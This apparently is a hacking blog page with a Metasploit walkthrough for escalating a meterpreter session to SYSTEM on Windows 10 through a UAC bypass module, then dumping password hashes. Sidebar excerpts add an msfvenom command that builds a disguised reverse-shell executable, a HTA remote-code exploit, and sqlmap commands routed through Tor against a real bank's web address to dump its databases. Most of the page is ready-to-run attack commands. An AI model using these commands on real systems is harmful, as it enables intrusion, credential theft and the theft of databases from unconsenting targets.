Skip to main content

Windows 10 UAC Bypass

Advanced Windows Exploitation


In the previous post we saw how to get a meterpreter session, now we will use the same session to exploit further and gain SYSTEM level privileges.

Taking into consideration that we have meterpreter session we will move on to next step.

STEP 1:

We will background the session that we had. To do this type the following command:
background (to get out of meterpreter)

Then type:
back (to get out of currently used exploit)

Then type:
search UAC (to get all the UAC bypass exploits)

STEP 2:

Select the most appropriate exploit that is running in the latest windows 10 update too.
Here we will select Windows Escalate UAC Protection Bypass (via SilentCleanup).
To use this type the following command:

use exploit/windows/local/bypassuac_silentcleanup
set lhost <your IP>
set lport 8080
set session <session ID>
*To see stored session IDs type sessions -l
set payload windows/x64/meterpreter/reverse_tcp
run



STEP 3:

We have successfully bypassed the UAC and have permissions elevated to SYSTEM level
Type following commands to check if you have the System level privileges.

getprivs
getsystem
getuid
hashdump
shell
...etc (there are many post exploitation modules that we will see in the next post)



Happy Hacking ☺

Reviews and Comments will be appreciated. Thanks ☺

Comments

  1. Can't we use eternal blue exploit to bypass UAC?

    ReplyDelete
    Replies
    1. Are U talking about this ?? --
      https://github.com/hanshaze/MS17-010-EternalBlue-WinXP-Win10

      See there are many exploits available and eternal blue is one of the best exploits available , but i didn't use it because it is a bit older exploit (2017)

      Delete

Post a Comment

Popular posts from this blog

Exploiting Windows 10

Exploiting Windows 10 (latest update) using metasploit (in KALI): Cyberator Introduction: The Metasploit Framework is the most commonly-used framework for hackers worldwide. It allows hackers to set up listeners that create a conducive environment (referred to as a Meterpreter) to manipulate compromised machines. In this article, we’ll look at how this framework within Kali Linux can be used to attack a Windows 10 machine.  This article assumes the installation of Kali Linux has been done and is reachable through a bridged connection from a Windows machine on Virtual-box. Step 1: - Open terminal in Kali and type the following command: msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<your IP> -f exe > /root/Desktop/crack.exe Step 2: - Open terminal in Kali and type the following commands     msfdb init    msfconsole    use exploit/multi/handler    set payload windows/x64/meterpreter/reverse_tcp    set lport 8080    set lhost <your IP address>    exploit S

SQLMAP - Using TOR proxy

Using SQLMAP with TOR OS: Windows 10 Compiler : Python 3.x Script : SQLMAP Proxy: TOR STEP 1: Download and install TOR  https://www.torproject.org/download/ STEP 2: Install TOR and Start TOR services After installing Tor, a new folder of Tor will be created (Desktop in my case) Navigate to the following location and start tor.exe Desktop\Tor Browser\Browser\TorBrowser\Tor STEP 3: Follow my previous post on SQLMAP to find a target Navigate to the SQLMAP folder in power shell. Execute the following commands- python .\sqlmap.py --tor --tor-type=SOCKS5 -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs STEP 4: Follow the same steps as in my previous post on SQLMAP to find Database names, Table names and dump the Tables. Just add the following option in it: .\sqlmap.py --tor --tor-type=SOCKS5 SQLMAP OPTIONS # Enumerate databases sqlmap --dbms=mysql -u " $URL " --dbs # Enumerate tables sqlmap --dbms=

Metasploit HTA exploit

Today, I will give you a demo of the new Windows Hta_Server RCE exploit that allows hackers / penetration testers to have remote access to a windows computer. The exploit was publicly disclosed in late 2016 but was not noticed to the public eye till late 2018. It can be found and used easily by using Metasploit on a Kali-Linux distribution. STEP 1: Check your IP configuration (in this practical I have kept it on Bridge) STEP 2: Fire-up msfconsole in the kali terminal and search for hta_server Commands : service apache2 start msfconsole search HTA use exploit/windows/misc/hta_server STEP 3: Set all the values in the Metasploit variables. Commands: set SRVHOST <Your IP> exploit STEP 4: Open powershell in windows and execute the following command (in your case different URL will be generated):  .\mshta.exe http://192.168.43.15:8080/Zhh7aIVVD.hta As the command gets executed it will open up a session in msfconsole. You can view the session using the following command: sessions -l and